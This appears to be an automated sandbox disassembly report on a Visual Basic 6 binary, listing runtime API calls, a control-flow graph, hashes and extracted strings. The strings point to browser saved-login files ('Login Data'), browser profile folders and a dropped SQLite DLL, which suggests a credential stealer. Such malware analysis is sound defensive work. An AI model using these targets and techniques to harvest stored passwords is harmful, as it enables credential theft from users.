                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004030D6,0040CC83), ref: 0042D1B7
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004030D6,0040CC83), ref: 0042D1C5
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D1E4
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • #666.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042D209
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,?), ref: 0042D23E
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0042D245
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D250
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042F35E
                                                            • Part of subcall function 0042ECB0: __vbaOnError.MSVBVM60(000000FF,6D42D8B1,?,6D41A323,00000000,004030D6), ref: 0042F38E
                                                            • Part of subcall function 0042ECB0: #645.MSVBVM60(00004008,00000010), ref: 0042F3B5
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F3C0
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(00405638,?), ref: 0042F3E3
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(00407034,?), ref: 0042F401
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(0040B454,?), ref: 0042F417
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(?,00000001), ref: 0042F43D
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F448
                                                            • Part of subcall function 0042ECB0: #579.MSVBVM60(00000000), ref: 0042F44F
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60 ref: 0042F469
                                                            • Part of subcall function 0042ECB0: __vbaRedimPreserve.MSVBVM60(00000180,00000004,?,00000008,00000001,00000000,00000000), ref: 0042F498
                                                          • __vbaAryMove.MSVBVM60(0043D05C,?,?,0000FFFF), ref: 0042D278
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0042D294
                                                          • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,00000000,004030D6,0040CC83), ref: 0042D2AE
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00000000,004030D6,0040CC83), ref: 0042D2C6
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,004030D6,0040CC83), ref: 0042D2DA
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00000000,004030D6,0040CC83), ref: 0042D2E8
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D307
                                                            • Part of subcall function 0042DDC0: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,00000002,?,?,?), ref: 0042DF0A
                                                            • Part of subcall function 0042DDC0: __vbaStrCopy.MSVBVM60 ref: 0042DF29
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(0042DF6C), ref: 0042DF65
                                                          • #666.MSVBVM60(?,00000008), ref: 0042D32C
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,?), ref: 0042D361
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0042D368
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D373
                                                            • Part of subcall function 0042ECB0: __vbaGenerateBoundsError.MSVBVM60 ref: 0042F4D8
                                                            • Part of subcall function 0042ECB0: __vbaGenerateBoundsError.MSVBVM60 ref: 0042F4EC
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(?), ref: 0042F4FF
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F50A
                                                            • Part of subcall function 0042ECB0: __vbaStrCopy.MSVBVM60 ref: 0042F51B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60 ref: 0042F524
                                                            • Part of subcall function 0042ECB0: #645.MSVBVM60(0000000A,00000000), ref: 0042F56D
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F578
                                                            • Part of subcall function 0042ECB0: __vbaFreeVar.MSVBVM60 ref: 0042F581
                                                            • Part of subcall function 0042ECB0: __vbaAryMove.MSVBVM60(?,?), ref: 0042F59B
                                                            • Part of subcall function 0042ECB0: __vbaAryDestruct.MSVBVM60(00000000,?,0042F5E7), ref: 0042F5D7
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60 ref: 0042F5E0
                                                          • __vbaAryMove.MSVBVM60(0043D060,?,?,0000FFFF), ref: 0042D39B
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0042D3B7
                                                          • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?), ref: 0042D3D1
                                                          • #526.MSVBVM60(?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0042D3EA
                                                          • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 0042D3F4
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 0042D401
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 0042D40A
                                                          • __vbaStrToAnsi.MSVBVM60(?,006725EC,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0042D426
                                                          • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042D438
                                                          • __vbaStrToUnicode.MSVBVM60(%g,?,?,?,?,?,?,?,?,?,?,?), ref: 0042D447
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 0042D45B
                                                          • #616.MSVBVM60(006725EC,00000013,?,?,?,?,?,?,?,?,?,?), ref: 0042D476
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 0042D483
                                                          • __vbaLenBstr.MSVBVM60(006725EC), ref: 0042D4AA
                                                          • #709.MSVBVM60(006725EC,004055A8,000000FF,00000000), ref: 0042D4C2
                                                          • #619.MSVBVM60(?,00004008,00000000), ref: 0042D4DC
                                                          • __vbaStrVarVal.MSVBVM60(?,?,00405638,00000001,000000FF,00000000), ref: 0042D4F5
                                                          • #712.MSVBVM60(006725EC,00000000), ref: 0042D502
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D50D
                                                          • __vbaStrCat.MSVBVM60(\winsqlite3.dll,006725EC), ref: 0042D51F
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D548
                                                          • __vbaStrCat.MSVBVM60(SysWOW64\winsqlite3.dll,00000000), ref: 0042D554
                                                          • #645.MSVBVM60(00000008,00000000), ref: 0042D56D
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D578
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0042D584
                                                          • #645.MSVBVM60(00000008,00000000), ref: 0042D59D
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D5A8
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0042D5B4
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0042D5E2
                                                          • __vbaFreeVarList.MSVBVM60(00000003,00000008,?,?), ref: 0042D5FC
                                                          • __vbaVarDup.MSVBVM60 ref: 0042D649
                                                          • #645.MSVBVM60(00000008,00000000), ref: 0042D655
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D660
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0042D66C
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042D683
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042D68C
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042D6B7
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0042D6CB
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042D6D9
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D6F8
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0042D710
                                                          • __vbaNew2.MSVBVM60(0040B3CC,0043D7AC), ref: 0042D729
                                                          • __vbaChkstk.MSVBVM60(?), ref: 0042D790
                                                          • __vbaChkstk.MSVBVM60(?), ref: 0042D7B3
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042D8D2
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0042D8E6
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042D8F4
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0042D908
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042D916
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0042D92A
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042D938
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D957
                                                          • #666.MSVBVM60(?,00000008,?,?), ref: 0042D97C
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042D99E
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D9BD
                                                          • #666.MSVBVM60(?,00000008,00000000,?), ref: 0042D9EE
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042DA10
                                                          • __vbaStrMove.MSVBVM60 ref: 0042DA2F
                                                          • #666.MSVBVM60(?,00000008,?,?), ref: 0042DA60
                                                          • __vbaVarAdd.MSVBVM60(?,00000008,?), ref: 0042DA78
                                                          • __vbaVarAdd.MSVBVM60(?,?,00000000), ref: 0042DA8D
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0042DAA2
                                                          • __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0042DAB7
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0042DABE
                                                          • __vbaStrMove.MSVBVM60 ref: 0042DACB
                                                          • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0042DB03
                                                          • __vbaFreeVarList.MSVBVM60(0000000A,00000008,?,00000008,?,?,?,?,?,?,?), ref: 0042DB4E
                                                          • #645.MSVBVM60(00004008,00000010), ref: 0042DB7B
                                                          • __vbaStrMove.MSVBVM60 ref: 0042DB86
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0042DB92
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042DBA9
                                                          • #531.MSVBVM60(00673F04), ref: 0042DBC7
                                                          • __vbaStrMove.MSVBVM60 ref: 0042DBEC
                                                          • __vbaNew2.MSVBVM60(00403DD8,0043D010), ref: 0042DC28
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0042DC62
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B41C,0000005C), ref: 0042DCA8
                                                          • __vbaFreeObj.MSVBVM60 ref: 0042DCC3
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0042DD9D), ref: 0042DD7B
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042DD8A
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042DD96
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0042DDAE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Copy$List$#645Error$#666$BstrChkstkDestruct$#516#631BoundsGenerateNew2$#526#531#537#579#608#616#619#632#709#712AnsiCheckHresultOverflowPreserveRedimSystemUnicode
                                                          • String ID: 0B3D0937293712$1436100C0604$1A2D06251C15230809000F0E$221B0C3A05152A30$2F25270F252A3D0003343B27$4_l$AJMysHCsjcSZXddJaKcAAE$C:\Users\Public\Libraries\vbsqlite3.dll$SysWOW64\winsqlite3.dll$ZYbKuIAfZGABKZsrrWeOuYJ$\Microsoft\Windows\Templates\$\winsqlite3.dll$g$wwHIhKTguiXEm$yWcCXIIGnvCBcQstMiqFXgUUsmGHJcqv$ycjdNikmPGuofJBlFuYhiU$%g
                                                          • API String ID: 1145599605-2924875536
                                                          • Opcode ID: 1c4c9723e3632eaab8d782c727ded8ef2507de139138fbb15002e82db8fa7e92
                                                          • Instruction ID: 75a5cb7136a121762e864e28ed6e0ca6a937ff8320533cc3b60a5d382a7ac27a
                                                          • Opcode Fuzzy Hash: 1c4c9723e3632eaab8d782c727ded8ef2507de139138fbb15002e82db8fa7e92
                                                          • Instruction Fuzzy Hash: 3172FB75901218DBDB14DFA0DD88BDEBBB8BF48304F1085AAE146B72A0DB745A89CF54
                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040FF44
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040FF5E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040FF6F
                                                          • __vbaStrMove.MSVBVM60 ref: 0040FF97
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040FFB8
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00410004
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00410021
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 00410062
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00410069
                                                          • #645.MSVBVM60(00000008,00000000), ref: 00410088
                                                          • __vbaStrMove.MSVBVM60 ref: 00410096
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 004100A2
                                                          • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,00000000,00000000), ref: 004100EA
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00000000,004030D6), ref: 004100F9
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,00000000,004030D6), ref: 0041015D
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,00000000,004030D6), ref: 0041017A
                                                          • #712.MSVBVM60(006E4528,\User Data,00405638,00000001,000000FF,00000000,?,?,?,?,?,?,00000000,004030D6), ref: 004101A9
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,00000000,004030D6), ref: 004101B6
                                                          • __vbaLenBstr.MSVBVM60(00678914), ref: 004101DD
                                                          • #709.MSVBVM60(00678914,004055A8,000000FF,00000000), ref: 004101F5
                                                          • #619.MSVBVM60(?,00004008,00000000), ref: 00410212
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 0041021F
                                                          • __vbaStrMove.MSVBVM60 ref: 0041022C
                                                          • __vbaFreeVar.MSVBVM60 ref: 00410238
                                                          • __vbaStrCopy.MSVBVM60 ref: 00410250
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041026A
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041027B
                                                          • __vbaStrMove.MSVBVM60 ref: 004102A3
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004102C4
                                                          • __vbaNew2.MSVBVM60(00405678,00000000), ref: 004102D9
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041035D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041037A
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 004103BA
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 004103C1
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405668,00000028), ref: 0041041D
                                                          • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 00410461
                                                          • __vbaFreeVar.MSVBVM60 ref: 00410470
                                                          • __vbaStrCat.MSVBVM60(\User Data\Default\Login Data,006E4528,?,?,?,?,?,?,00000000,004030D6), ref: 00410506
                                                          • #645.MSVBVM60(00000008,00000000), ref: 00410525
                                                          • __vbaStrMove.MSVBVM60 ref: 00410533
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0041053F
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041055A
                                                          • __vbaFreeVar.MSVBVM60 ref: 00410566
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00412DD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Error$BoundsGenerate$BstrCopy$List$#516#631#645$#537#608#619#632#709#712CheckHresultNew2Overflow
                                                          • String ID: (En$1D012D3D2A24701E0A2738$333D2D2928333C13241805111D34572E34002C$EoyHOIFPgxTjvtZwjUtMeZQ$Profiles$S$\Profiles$\User Data$\User Data\Default\Login Data$jAMBZCJPZkSYHclvQlTnjDT
                                                          • API String ID: 3691625242-2554719228
                                                          • Opcode ID: 11e00ef95b24a0c2a8609bbae7b963d32d1441d4c4473df5024f34398dd7c4ae
                                                          • Instruction ID: 88bcc81e1a817e0464b53eb0a68279d7e96d2726d39273a4a03c0112dedafa3a
                                                          • Opcode Fuzzy Hash: 11e00ef95b24a0c2a8609bbae7b963d32d1441d4c4473df5024f34398dd7c4ae
                                                          • Instruction Fuzzy Hash: F5C21870A01218DFEB24CF54DD84BEAB7B1FB49704F1081EAE549A72A0DB745AC6CF58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5672 42ecb0-42ed13 __vbaLenBstr 5673 42ed18-42ed1e 5672->5673 5674 42edc6-42edfd 5673->5674 5675 42ed24-42edb8 #632 __vbaVarCat __vbaI4ErrVar #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr __vbaFreeVarList 5673->5675 5676 42ee14-42eec1 __vbaErrorOverflow __vbaChkstk __vbaOnError __vbaVarVargNofree __vbaVarSub __vbaI2Var 5675->5676 5677 42edba-42edc1 5675->5677 5680 42eed8-42eee3 5676->5680 5677->5673 5681 42efc7-42efd8 5680->5681 5682 42eee9-42eefa 5680->5682 5684 42ef00-42ef15 5682->5684 5685 42efec-42f061 __vbaErrorOverflow __vbaChkstk __vbaOnError 5682->5685 5684->5685 5687 42ef1b-42efc2 __vbaChkstk * 2 __vbaVarIndexLoad __vbaChkstk __vbaVarIndexStore __vbaFreeVar 5684->5687 5689 42f063-42f072 5685->5689 5690 42f074-42f089 __vbaLbound 5685->5690 5687->5685 5692 42eed4 5687->5692 5691 42f08c-42f099 5689->5691 5690->5691 5693 42f09b-42f0aa 5691->5693 5694 42f0ac-42f0c1 __vbaUbound 5691->5694 5692->5680 5695 42f0c4-42f0d1 5693->5695 5694->5695 5696 42f0d7-42f0da 5695->5696 5697 42f335-42f3cd __vbaErrorOverflow __vbaChkstk __vbaOnError #645 __vbaStrMove 5695->5697 5696->5697 5698 42f0e0-42f0e3 5696->5698 5700 42f3d3-42f3eb __vbaStrCmp 5697->5700 5698->5697 5701 42f0e9-42f147 #525 __vbaStrMove 5698->5701 5702 42f3f1-42f426 __vbaStrCmp * 2 5700->5702 5703 42f58c-42f5e6 __vbaAryMove __vbaAryDestruct __vbaFreeStr 5700->5703 5708 42f2cb-42f31e __vbaStrCopy __vbaFreeStr * 2 5701->5708 5709 42f14d-42f168 __vbaAryLock 5701->5709 5705 42f552-42f587 #645 __vbaStrMove __vbaFreeVar 5702->5705 5706 42f42c-42f475 __vbaStrCat __vbaStrMove #579 __vbaFreeStr 5702->5706 5705->5700 5706->5705 5710 42f47b-42f4ac __vbaRedimPreserve 5706->5710 5712 42f16a-42f171 5709->5712 5713 42f1ad-42f1b3 __vbaGenerateBoundsError 5709->5713 5715 42f4ae-42f4b5 5710->5715 5716 42f4ec-42f4f2 __vbaGenerateBoundsError 5710->5716 5712->5713 5714 42f173-42f188 5712->5714 5717 42f1b9-42f21b #572 __vbaStrMove __vbaAryUnlock __vbaStrMove __vbaLenBstr 5713->5717 5718 42f196-42f19c __vbaGenerateBoundsError 5714->5718 5719 42f18a-42f194 5714->5719 5715->5716 5720 42f4b7-42f4cd 5715->5720 5723 42f4f5-42f548 __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStr 5716->5723 5721 42f23e-42f24b 5717->5721 5722 42f21d-42f238 __vbaStrCat __vbaStrMove 5717->5722 5724 42f1a2-42f1ab 5718->5724 5719->5724 5725 42f4d8-42f4de __vbaGenerateBoundsError 5720->5725 5726 42f4cf-42f4d6 5720->5726 5727 42f2a2-42f2b9 __vbaMidStmtBstr 5721->5727 5728 42f24d-42f297 __vbaStrCat __vbaStrMove __vbaMidStmtBstr __vbaFreeStr 5721->5728 5722->5721 5729 42f54e 5723->5729 5730 42f5fd-42f71f __vbaErrorOverflow __vbaChkstk __vbaOnError __vbaNew __vbaObjSet __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 5723->5730 5724->5717 5732 42f4e1-42f4ea 5725->5732 5726->5732 5734 42f2bf-42f2c6 5727->5734 5728->5697 5733 42f29d-42f2a0 5728->5733 5729->5705 5740 42f741 5730->5740 5741 42f721-42f73f __vbaHresultCheckObj 5730->5741 5732->5723 5733->5734 5742 42f74b-42f810 __vbaObjSet __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove 5740->5742 5741->5742 5748 42f832 5742->5748 5749 42f812-42f830 __vbaHresultCheckObj 5742->5749 5750 42f83c-42f87d __vbaFreeStrList 5748->5750 5749->5750 5752 42f87f-42f89a __vbaHresultCheckObj 5750->5752 5753 42f89c 5750->5753 5754 42f8a6-42f8c6 5752->5754 5753->5754 5756 42f8e5 5754->5756 5757 42f8c8-42f8e3 __vbaHresultCheckObj 5754->5757 5758 42f8ef-42f9c3 __vbaVar2Vec __vbaAryMove __vbaFreeVar __vbaCastObj __vbaObjSet __vbaCastObj __vbaObjSet __vbaFreeObj * 2 5756->5758 5757->5758
                                                          APIs
                                                          • __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                          • #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                          • __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                          • __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                          • #537.MSVBVM60(00000000), ref: 0042ED76
                                                          • __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                          • __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                          • __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                          • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0042EE14
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042EE3E
                                                          • __vbaOnError.MSVBVM60(000000FF,6D42D8B1,?,6D41A323,00000000,004030D6), ref: 0042EE6E
                                                          • __vbaVarVargNofree.MSVBVM60 ref: 0042EE8F
                                                          • __vbaVarSub.MSVBVM60(?,00000002,00000000), ref: 0042EE9E
